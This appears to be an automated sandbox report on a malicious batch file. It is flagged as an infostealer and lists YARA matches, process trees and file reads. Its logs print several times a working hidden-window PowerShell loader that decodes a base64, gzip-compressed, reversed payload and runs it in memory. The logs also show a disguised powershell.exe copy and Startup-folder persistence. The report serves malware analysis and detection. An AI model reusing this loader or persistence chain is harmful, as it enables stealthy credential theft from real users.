                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_088CC9F77_2_088CC9F7
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_088C952A7_2_088C952A
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_088C95387_2_088C9538
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_088C3E0F7_2_088C3E0F
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_089B00117_2_089B0011
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_089B00407_2_089B0040
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_089B31887_2_089B3188
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_089B31417_2_089B3141
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_089B2A897_2_089B2A89
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_08C4EF987_2_08C4EF98
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_08C300407_2_08C30040
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_08C3001B7_2_08C3001B
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_08C4E2587_2_08C4E258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00C441F08_2_00C441F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00C44AC08_2_00C44AC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00C43EA88_2_00C43EA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05EBB4A88_2_05EBB4A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05EB67808_2_05EB6780
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05EB00408_2_05EB0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05EB33908_2_05EB3390
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05EBE9598_2_05EBE959
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05EB88A88_2_05EB88A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05EBADC88_2_05EBADC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05EB8FFB8_2_05EB8FFB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05EB59888_2_05EB5988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_066C33D08_2_066C33D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05EB00258_2_05EB0025
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05EB00068_2_05EB0006
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_04B1F4E019_2_04B1F4E0
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_04B1B76619_2_04B1B766
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_092BC6D019_2_092BC6D0
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_092BC9F719_2_092BC9F7
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_092B000619_2_092B0006
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_092BD8D819_2_092BD8D8
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_092B3E0F19_2_092B3E0F
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_093A314119_2_093A3141
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_093A318819_2_093A3188
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_093A001E19_2_093A001E
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_093A004019_2_093A0040
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_093A2A8919_2_093A2A89
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_0983EF9819_2_0983EF98
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_0982001519_2_09820015
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_0982004019_2_09820040
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_0983E25819_2_0983E258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_00AE4AC020_2_00AE4AC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_00AE3EA820_2_00AE3EA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_00AE41F020_2_00AE41F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_00AEF6D820_2_00AEF6D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_0608678020_2_06086780
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_0608B4A820_2_0608B4A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_0608339020_2_06083390
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_0608004020_2_06080040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_060888A820_2_060888A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_0608E95920_2_0608E959
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_06088FFB20_2_06088FFB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_0608ADC820_2_0608ADC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_0608598820_2_06085988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_067633D020_2_067633D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_0608000720_2_06080007
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262268003.000000000293B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.00000000048A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230653577.0000000000454000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFittings-Pipping.exeB vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTdhvrq.dll" vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2287026414.0000000007FA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTdhvrq.dll" vs 87M9Y3P4Z7.bat
                    Source: 87M9Y3P4Z7.bat.Zhe.5.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs 87M9Y3P4Z7.bat
                    Source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winBAT@31/9@4/2
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ktqy3wn.ooi.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" "
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheFile read: C:\Users\user\Desktop\87M9Y3P4Z7.batJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" "
                    Source: C:\Windows\System32\xcopy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\xcopy.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\xcopy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
                    Source: C:\Windows\System32\xcopy.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
                    Source: C:\Windows\System32\xcopy.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
                    Source: C:\Windows\System32\xcopy.exeProcess created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"Jump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ifsutil.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: atl.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: mscoree.dllJump to behavior
